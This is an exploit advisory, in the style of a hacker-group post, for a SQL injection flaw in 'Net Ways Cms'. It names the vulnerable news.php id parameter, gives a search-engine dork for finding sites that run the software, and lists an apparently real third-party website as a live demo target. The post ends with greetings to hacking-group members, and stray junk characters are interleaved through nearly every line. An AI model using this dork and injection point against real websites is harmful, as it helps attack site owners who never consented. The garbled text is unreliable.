################################################################################??######## ! _. f$ t' M! _1 s" S9 n6 R
#
) W! m+ @; S( L. F# Exploit Title : Net Ways Cms Sql Injection Vulnerability 7 L7 e+ R3 B3 L
#
5 d# R8 e' A' f2 @ v# Author : IrIsT.Ir % X" t& o4 `- i$ c
#
4 m) V3 I1 x$ P Y* D! L# Discovered By : Am!r + O6 Q7 r7 X1 R# s
# 9 h: m4 w' }2 ^+ e8 Z
# Home : http://IrIsT.Ir/forum
' f% G2 b0 k: _+ U#
/ w% u9 }6 U3 D4 L B# Software Link : http://www.netways.com/ www.political-security.com
" s; @6 d# F2 U- ?; |( m; I#
2 [( P0 ~8 q/ B) p' s2 k# Security Risk : High # G* ~5 S0 N' I% H
#
! t- l6 r$ T& a5 a3 A1 o+ q9 T% k# Version : All Version 1 U5 U$ u: `7 s
# ' `9 S( u, v# f+ U6 Z N7 ?
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
; u4 N8 O2 x+ V" Z. Z#
9 l; Y6 U) L; A# X5 X+ {# Dork : intext:"Designed & developed by NetWays"
# S3 _* M+ S0 _5 w, Z) M- Z6 S4 B3 S# , s- R; w/ R: I5 c
################################################################################??########
/ g* y4 C' t% w/ O! n# . z/ e8 S1 h9 i6 I# [
# Expl0iTs : ! B, y) A" X. V* Z* |8 f! q+ k
#
: ^; M' p* U! I- F8 k, m# Z, r# http://target.com/news.php?id=[Sql]
/ e) N' B# _1 p9 M#
4 _6 q/ x! [" I6 e( }0 \1 O#
0 r0 W) [& X3 D# D3mo :
: E/ ^8 ^6 U8 i9 _3 \3 t#
' M d+ Z' L$ o2 G* f/ E' \* d# http://compagnieparento.com/news.php?id=7[Sql] 1 K v; o% q* G9 q
#
5 Q, t, y- T: b! _( {################################################################################??######## 0 x3 T& g# _. E' C8 U6 x+ k
#
! x$ W; X! E7 n! n# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
6 p$ l4 W& f( e2 O- I/ ?( L# ~# g+ {+ D& K8 U G9 ^7 e5 g
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
1 m' n5 I3 q3 ?8 g6 p8 c4 b$ W#
& N" g4 u8 B: j6 L: d2 Y. `# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
* a/ y1 a0 F) g3 l+ D# O' {' @% k, i4 H) ^
################################################################################??######## |